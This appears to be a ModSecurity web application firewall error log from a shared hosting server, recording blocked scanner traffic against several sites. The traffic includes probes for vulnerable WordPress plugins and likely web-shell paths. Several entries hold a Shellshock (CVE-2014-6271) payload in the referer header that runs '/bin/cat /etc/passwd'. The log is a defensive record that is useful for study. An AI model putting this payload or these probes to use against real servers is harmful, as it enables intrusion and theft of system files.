[Tue May 26 15:12:43.530004 2026] [security2:error] [pid 686593:tid 686723] [client 196.51.12.21:42789] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5WgAAAIU"], referer: https://anujtradingco.com
[Tue May 26 15:12:43.558166 2026] [security2:error] [pid 686593:tid 686796] [client 23.94.40.119:42358] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/webadmin/auth/verification.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5bwAAAM4"], referer: https://webmail.pronumbers.com.au/webadmin/start/
[Tue May 26 15:12:43.561432 2026] [security2:error] [pid 686593:tid 686763] [client 23.94.40.119:42368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5cAAAAK0"]
[Tue May 26 15:12:43.649780 2026] [security2:error] [pid 686593:tid 686803] [client 104.43.242.179:41738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrE-ilgkZcvx0_tl-5dwAAANU"]
[Tue May 26 15:12:43.739137 2026] [security2:error] [pid 686593:tid 686801] [client 104.43.242.179:41738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrE-ilgkZcvx0_tl-5ewAAANM"]
[Tue May 26 15:12:43.801587 2026] [security2:error] [pid 686593:tid 686753] [client 104.43.242.179:41738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5fQAAAKM"]
[Tue May 26 15:12:43.801696 2026] [security2:error] [pid 686593:tid 686753] [client 104.43.242.179:41738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5fQAAAKM"]
[Tue May 26 15:12:44.021104 2026] [security2:error] [pid 686593:tid 686833] [client 23.94.40.119:42402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrFOilgkZcvx0_tl-5jAAAAPM"]
[Tue May 26 15:12:44.227425 2026] [security2:error] [pid 686593:tid 686830] [client 23.94.40.119:42406] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahVrFOilgkZcvx0_tl-5kgAAAPA"]
[Tue May 26 15:12:45.130585 2026] [security2:error] [pid 686593:tid 686743] [client 23.94.40.119:42418] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/cgibin/webproc"] [unique_id "ahVrFeilgkZcvx0_tl-5pwAAAJk"]
[Tue May 26 15:12:45.545525 2026] [security2:error] [pid 686593:tid 686823] [client 23.94.40.119:42454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVrFeilgkZcvx0_tl-5tgAAAOk"]
[Tue May 26 15:12:45.546154 2026] [security2:error] [pid 686593:tid 686847] [client 23.94.40.119:42462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrFeilgkZcvx0_tl-5twAAAQE"]
[Tue May 26 15:12:45.576838 2026] [security2:error] [pid 686593:tid 686849] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrFeilgkZcvx0_tl-5qgAAAQM"]
[Tue May 26 15:12:45.582769 2026] [security2:error] [pid 686593:tid 686791] [client 23.94.40.119:42474] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/stats"] [unique_id "ahVrFeilgkZcvx0_tl-5uwAAAMk"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.583142 2026] [security2:error] [pid 686593:tid 686800] [client 23.94.40.119:42486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/test"] [unique_id "ahVrFeilgkZcvx0_tl-5vAAAANI"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.583694 2026] [security2:error] [pid 686593:tid 686777] [client 23.94.40.119:42494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ahVrFeilgkZcvx0_tl-5vQAAALs"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.583924 2026] [security2:error] [pid 686593:tid 686748] [client 23.94.40.119:42496] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/test.cgi"] [unique_id "ahVrFeilgkZcvx0_tl-5vgAAAJ4"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.584264 2026] [security2:error] [pid 686593:tid 686768] [client 23.94.40.119:42510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/debug.cgi"] [unique_id "ahVrFeilgkZcvx0_tl-5vwAAALI"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.584912 2026] [security2:error] [pid 686593:tid 686841] [client 23.94.40.119:42524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/test-cgi"] [unique_id "ahVrFeilgkZcvx0_tl-5wAAAAPs"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.592421 2026] [security2:error] [pid 686593:tid 686802] [client 23.94.40.119:42530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/backupmgt/pre_connect_check.php"] [unique_id "ahVrFeilgkZcvx0_tl-5wQAAANQ"]
[Tue May 26 15:12:45.604926 2026] [security2:error] [pid 686593:tid 686801] [client 23.94.40.119:42564] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/mainwp-vuln/readme.txt"] [unique_id "ahVrFeilgkZcvx0_tl-5wgAAANM"]
[Tue May 26 15:12:45.605039 2026] [security2:error] [pid 686593:tid 686799] [client 23.94.40.119:42536] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/wsecure/wsecure-config.php"] [unique_id "ahVrFeilgkZcvx0_tl-5wwAAANE"]
[Tue May 26 15:12:45.605817 2026] [security2:error] [pid 686593:tid 686737] [client 23.94.40.119:42548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/status"] [unique_id "ahVrFeilgkZcvx0_tl-5xAAAAJM"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.608210 2026] [security2:error] [pid 686593:tid 686734] [client 23.94.40.119:42526] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/cgi-bin/test.cgi"] [unique_id "ahVrFeilgkZcvx0_tl-5xQAAAJA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.608833 2026] [security2:error] [pid 686593:tid 686750] [client 23.94.40.119:42466] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahVrFeilgkZcvx0_tl-5xgAAAKA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 15:12:45.797912 2026] [security2:error] [pid 686593:tid 686815] [client 104.43.242.179:33408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/half.php"] [unique_id "ahVrFeilgkZcvx0_tl-5ywAAAOE"]
[Tue May 26 15:12:45.797990 2026] [security2:error] [pid 686593:tid 686815] [client 104.43.242.179:33408] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/half.php"] [unique_id "ahVrFeilgkZcvx0_tl-5ywAAAOE"]
[Tue May 26 15:12:45.855789 2026] [security2:error] [pid 686593:tid 686647] [remote 47.128.119.167:23452] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahVrFeilgkZcvx0_tl-5zQAA7DU"]
[Tue May 26 15:12:45.958944 2026] [security2:error] [pid 686593:tid 686828] [client 85.121.240.156:56948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrFeilgkZcvx0_tl-5zAAAAO4"]
[Tue May 26 15:12:46.013488 2026] [security2:error] [pid 686593:tid 686820] [client 23.94.40.119:42574] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "264"] [id "900296"] [msg "Gravity Forms Unsecured Upload Attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahVrFuilgkZcvx0_tl-50gAAAOY"]
[Tue May 26 15:12:46.248910 2026] [security2:error] [pid 686593:tid 686840] [client 120.76.249.76:60514] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrFuilgkZcvx0_tl-51AAA-j0"], referer: https://www.jhonweb.com/statics/images/ext/dir.gif
[Tue May 26 15:12:46.420449 2026] [security2:error] [pid 686593:tid 686751] [client 23.94.40.119:42584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/boardDataWW.php"] [unique_id "ahVrFuilgkZcvx0_tl-52wAAAKE"]
[Tue May 26 15:12:46.516341 2026] [security2:error] [pid 686593:tid 686752] [client 23.94.40.119:42586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrFuilgkZcvx0_tl-53gAAAKI"]
[Tue May 26 15:12:46.545221 2026] [security2:error] [pid 686593:tid 686809] [client 23.94.40.119:42596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/showbizpro/temp/update_extract/eX9NR.php"] [unique_id "ahVrFuilgkZcvx0_tl-54AAAANs"]
[Tue May 26 15:12:46.545389 2026] [security2:error] [pid 686593:tid 686774] [client 23.94.40.119:42612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/bj-lazy-load/thumb.php"] [unique_id "ahVrFuilgkZcvx0_tl-54QAAALg"]
[Tue May 26 15:12:46.746581 2026] [security2:error] [pid 686593:tid 686788] [client 23.94.40.119:42616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/wp-mobile-detector/resize.php"] [unique_id "ahVrFuilgkZcvx0_tl-56wAAAMY"]
[Tue May 26 15:12:46.837741 2026] [security2:error] [pid 686593:tid 686737] [client 23.94.40.119:42640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/uploads/post_files/3efyju9rqou39unkd1vucdxiwde.php"] [unique_id "ahVrFuilgkZcvx0_tl-57QAAAJM"]
[Tue May 26 15:12:46.938521 2026] [security2:error] [pid 686593:tid 686746] [client 104.43.242.179:45425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/2P.php"] [unique_id "ahVrFuilgkZcvx0_tl-58gAAAJw"]
[Tue May 26 15:12:46.938665 2026] [security2:error] [pid 686593:tid 686746] [client 104.43.242.179:45425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/2P.php"] [unique_id "ahVrFuilgkZcvx0_tl-58gAAAJw"]
[Tue May 26 15:12:47.126018 2026] [security2:error] [pid 686593:tid 686838] [client 23.94.40.119:42644] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrF-ilgkZcvx0_tl-5-gAAAPg"]
[Tue May 26 15:12:47.423485 2026] [security2:error] [pid 686593:tid 686785] [client 23.94.40.119:42660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/uploads/user_uploads/3efyju9rqou39unkd1vucdxiwde.php"] [unique_id "ahVrF-ilgkZcvx0_tl-6CQAAAMM"]
[Tue May 26 15:12:47.612642 2026] [security2:error] [pid 686593:tid 686830] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrF-ilgkZcvx0_tl-5_gAAAPA"]
[Tue May 26 15:12:47.651931 2026] [security2:error] [pid 686593:tid 686762] [client 104.43.242.179:20906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/tires.php"] [unique_id "ahVrF-ilgkZcvx0_tl-6FAAAAKw"]
[Tue May 26 15:12:47.652089 2026] [security2:error] [pid 686593:tid 686762] [client 104.43.242.179:20906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/tires.php"] [unique_id "ahVrF-ilgkZcvx0_tl-6FAAAAKw"]
[Tue May 26 15:12:48.934173 2026] [security2:error] [pid 686593:tid 686785] [client 104.43.242.179:32076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mexicoimportaciones.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVrGOilgkZcvx0_tl-6OQAAAMM"]
[Tue May 26 15:12:49.011848 2026] [security2:error] [pid 686593:tid 686779] [client 104.43.242.179:32076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/like.php"] [unique_id "ahVrGeilgkZcvx0_tl-6PwAAAL0"]
[Tue May 26 15:12:49.011944 2026] [security2:error] [pid 686593:tid 686779] [client 104.43.242.179:32076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/like.php"] [unique_id "ahVrGeilgkZcvx0_tl-6PwAAAL0"]
[Tue May 26 15:12:49.362548 2026] [security2:error] [pid 686593:tid 686807] [client 85.121.240.156:34514] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrGeilgkZcvx0_tl-6SgAAANk"]
[Tue May 26 15:12:49.444463 2026] [security2:error] [pid 686593:tid 686829] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrGeilgkZcvx0_tl-6QAAAAO8"]
[Tue May 26 15:12:50.081913 2026] [security2:error] [pid 686593:tid 686783] [client 104.43.242.179:45411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/.well-known/about.php"] [unique_id "ahVrGuilgkZcvx0_tl-6YAAAAME"]
[Tue May 26 15:12:50.082051 2026] [security2:error] [pid 686593:tid 686783] [client 104.43.242.179:45411] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/.well-known/about.php"] [unique_id "ahVrGuilgkZcvx0_tl-6YAAAAME"]
[Tue May 26 15:12:51.353513 2026] [security2:error] [pid 686593:tid 686798] [client 104.43.242.179:32069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVrG-ilgkZcvx0_tl-6jAAAANA"]
[Tue May 26 15:12:51.353646 2026] [security2:error] [pid 686593:tid 686798] [client 104.43.242.179:32069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVrG-ilgkZcvx0_tl-6jAAAANA"]
[Tue May 26 15:12:52.112071 2026] [security2:error] [pid 686593:tid 686796] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrG-ilgkZcvx0_tl-6lQAAAM4"]
[Tue May 26 15:12:52.314865 2026] [security2:error] [pid 686593:tid 686826] [client 23.94.40.119:35696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVrHOilgkZcvx0_tl-6rQAAAOw"]
[Tue May 26 15:12:52.534965 2026] [security2:error] [pid 686593:tid 686816] [client 104.43.242.179:38661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/bob.php"] [unique_id "ahVrHOilgkZcvx0_tl-6tQAAAOI"]
[Tue May 26 15:12:52.535092 2026] [security2:error] [pid 686593:tid 686816] [client 104.43.242.179:38661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/bob.php"] [unique_id "ahVrHOilgkZcvx0_tl-6tQAAAOI"]
[Tue May 26 15:12:52.616862 2026] [security2:error] [pid 686593:tid 686807] [client 23.94.40.119:35708] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"] [unique_id "ahVrHOilgkZcvx0_tl-6uAAAANk"]
[Tue May 26 15:12:52.618031 2026] [security2:error] [pid 686593:tid 686848] [client 23.94.40.119:35702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/__debugging_center_utils___.php"] [unique_id "ahVrHOilgkZcvx0_tl-6uQAAAQI"]
